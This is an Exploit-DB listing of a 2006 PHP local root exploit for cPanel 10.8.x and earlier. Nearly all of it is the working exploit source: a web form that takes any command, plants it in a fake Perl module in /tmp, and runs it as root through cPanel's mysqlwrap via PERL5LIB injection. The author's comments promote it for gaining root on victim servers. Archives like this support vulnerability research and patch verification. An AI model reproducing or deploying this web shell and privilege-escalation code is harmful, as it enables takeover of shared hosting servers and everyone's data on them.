cPanel <= 10.8.x - cpwrap via mysqladmin Local Root Exploit php

2006-10-13T00:00:00
ID EDB-ID:2554
Type exploitdb
Reporter Nima Salehi
Modified 2006-10-13T00:00:00

Description

cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php). Webapps exploit for php platform

                                        
                                            &lt;!- for use old cpanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need have
&lt;!- bash shell access on victim server but with this new exploit you only need
&lt;!- to upload php file and run this into browser on victim servers.
&lt;!- then you have root Access and you can do anything ....
&lt;!- Coded by nima salehi ( nima@ashiyane.ir )
&lt;!- Ashiyane Security Corporation www.Ashiyane.ir &gt;
&lt;title&gt;cPanel &lt;= 10.8.x cpwrap root exploit (PHP)&lt;/title&gt;
&lt;center&gt;&lt;img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"&gt;&lt;br&gt;&lt;br&gt;
&lt;?

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
echo "&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;b&gt;Sorry Safe-mode Is On ( Script Not Work On This Server ) &lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;";
echo "&lt;br&gt;&lt;br&gt;&lt;br&gt;Powered By Ashiyane Security Corporation &lt;a href=\"http://www.ashiyane.ir\"&gt; www.Ashiyane.ir";
exit();
}

$disablef = @ini_get("disable_functions");
if (!empty($disablef))
{
 $disablef = str_replace(" ","",$disablef);
 $disablef = explode(",",$disablef);
 if (in_array("passthru",$disablef))
 {
 echo "&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;b&gt;Sorry Passthru Is Disable ( Script Not Work On This Server ) &lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;";
 echo "&lt;br&gt;&lt;br&gt;&lt;br&gt;Powered By Ashiyane Security Corporation &lt;a href=\"http://www.ashiyane.ir\"&gt; www.Ashiyane.ir";
 exit();
 }
}

?&gt;

&lt;form method="POST" action="&lt;?php echo $surl; ?&gt;"&gt;
Command : &lt;input type="text" name="c" size="40"&gt;
&lt;input type="submit" value="  Run  " name="B1"&gt;&lt;/form&gt;
&lt;textarea cols="60" rows="20" readonly&gt;
&lt;?php
$cmd=$_POST['c'];
if ( $cmd != "" )
{
$f=fopen("/tmp/strict.pm", "w");
fputs($f,'system("'.$cmd.'");');
fclose($f);
passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
}
?&gt;
&lt;/textarea&gt;
&lt;br&gt;
Powered By  Ashiyane Security Corporation &lt;a href="http://www.ashiyane.ir"&gt; www.Ashiyane.ir
&lt;/center&gt;

# milw0rm.com [2006-10-13]